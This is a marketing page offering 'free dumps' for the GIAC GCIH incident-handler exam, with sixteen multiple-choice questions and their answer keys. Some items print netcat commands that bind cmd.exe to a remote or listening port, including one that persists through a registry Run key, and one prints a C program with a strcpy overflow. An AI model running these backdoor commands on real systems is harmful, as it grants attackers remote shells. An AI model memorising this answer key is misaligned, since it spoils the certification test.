Cause all that matters here is passing the GIAC GCIH exam. Cause all that you need is a high score of GCIH GIAC Certified Incident Handler exam. The only one thing you need to do is downloading Ucertify GCIH exam study guides now. We will not let you down with our money-back guarantee.

GIAC GCIH Free Dumps Questions Online, Read and Test Now.

NEW QUESTION 1
Which of the following tools are used as a network traffic monitoring tool in the Linux operating system?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Netbus
  • B. IPTraf
  • C. MRTG
  • D. Ntop

Answer: BCD

NEW QUESTION 2
Which of the following is a computer worm that caused a denial of service on some Internet hosts and dramatically slowed down general Internet traffic?

  • A. Klez
  • B. Code red
  • C. SQL Slammer
  • D. Beast

Answer: C

NEW QUESTION 3
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
"c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

  • A. You want to perform banner grabbing.
  • B. You want to set the Netcat to execute command any time.
  • C. You want to put Netcat in the stealth mode.
  • D. You want to add the Netcat command to the Windows registry.

Answer: BCD

NEW QUESTION 4
Which of the following is the method of hiding data within another media type such as graphic or document?

  • A. Spoofing
  • B. Steganography
  • C. Packet sniffing
  • D. Cryptanalysis

Answer: B

NEW QUESTION 5
Mark works as a Network Administrator for Perfect Inc. The company has both wired and wireless networks. An attacker attempts to keep legitimate users from accessing services that they require. Mark uses IDS/IPS sensors on the wired network to mitigate the attack. Which of the following attacks best describes the attacker's intentions?

  • A. Internal attack
  • B. Reconnaissance attack
  • C. Land attack
  • D. DoS attack

Answer: D

NEW QUESTION 6
Which of the following statements are true regarding SYN flood attack?

  • A. The attacker sends a succession of SYN requests to a target system.
  • B. SYN flood is a form of Denial-of-Service (DoS) attack.
  • C. The attacker sends thousands and thousands of ACK packets to the victim.
  • D. SYN cookies provide protection against the SYN flood by eliminating the resources allocated on the target host.

Answer: ABD

NEW QUESTION 7
Which of the following programming languages are NOT vulnerable to buffer overflow attacks?
Each correct answer represents a complete solution. Choose two.

  • A. C
  • B. Java
  • C. C++
  • D. Perl

Answer: BD

NEW QUESTION 8
Which of the following is the difference between SSL and S-HTTP?

  • A. SSL operates at the application layer and S-HTTP operates at the network layer.
  • B. SSL operates at the application layer and S-HTTP operates at the transport layer.
  • C. SSL operates at the network layer and S-HTTP operates at the application layer.
  • D. SSL operates at the transport layer and S-HTTP operates at the application layer.

Answer: D

NEW QUESTION 9
You execute the following netcat command:
c:\target\nc -1 -p 53 -d -e cmd.exe
What action do you want to perform by issuing the above command?

  • A. Listen the incoming data and performing port scanning
  • B. Capture data on port 53 and performing banner grabbing
  • C. Capture data on port 53 and delete the remote shell
  • D. Listen the incoming traffic on port 53 and execute the remote shell

Answer: D

NEW QUESTION 10
Which of the following is a technique for creating Internet maps?
Each correct answer represents a complete solution. Choose two.

  • A. Active Probing
  • B. AS PATH Inference
  • C. Object Relational Mapping
  • D. Network Quota

Answer: AB

NEW QUESTION 11
Which of the following applications automatically calculates cryptographic hashes of all key system files that are to be monitored for modifications?

  • A. Tripwire
  • B. TCPView
  • C. PrcView
  • D. Inzider

Answer: A

NEW QUESTION 12
John works as a C programmer. He develops the following C program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int buffer(char *str) {
char buffer1[10];
strcpy(buffer1, str);
return 1;
}
int main(int argc, char *argv[]) {
buffer (argv[1]);
printf("Executed\n");
return 1;
}
His program is vulnerable to a __________ attack.

  • A. SQL injection
  • B. Denial-of-Service
  • C. Buffer overflow
  • D. Cross site scripting

Answer: C

NEW QUESTION 13
An Active Attack is a type of steganography attack in which the attacker changes the carrier during the communication process. Which of the following techniques is used for smoothing the transition and controlling contrast on the hard edges, where there is significant color transition?

  • A. Soften
  • B. Rotate
  • C. Sharpen
  • D. Blur

Answer: D

NEW QUESTION 14
John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare-secure.com. He enters a single quote in the input field of the login page of the We- are-secure Web site and receives the following error message:
Microsoft OLE DB Provider for ODBC Drivers error '0x80040E14'
This error message shows that the We-are-secure Website is vulnerable to __________.

  • A. A buffer overflow
  • B. A Denial-of-Service attack
  • C. A SQL injection attack
  • D. An XSS attack

Answer: C

NEW QUESTION 15
You are hired as a Database Administrator for Jennifer Shopping Cart Inc. You monitor the server health through the System Monitor and found that there is a sudden increase in the number of logins.
A case study is provided in the exhibit. Which of the following types of attack has occurred? (Click the Exhibit button on the toolbar to see the case study.)

  • A. Injection
  • B. Virus
  • C. Worm
  • D. Denial-of-service

Answer: D

NEW QUESTION 16
Which of the following Denial-of-Service (DoS) attacks employ IP fragmentation mechanism?
Each correct answer represents a complete solution. Choose two.

  • A. Land attack
  • B. SYN flood attack
  • C. Teardrop attack
  • D. Ping of Death attack

Answer: CD

NEW QUESTION 17
......

Recommend!! Get the Full GCIH dumps in VCE and PDF From Downloadfreepdf.net, Welcome to Download: https://www.downloadfreepdf.net/GCIH-pdf-download.html (New 328 Q&As Version)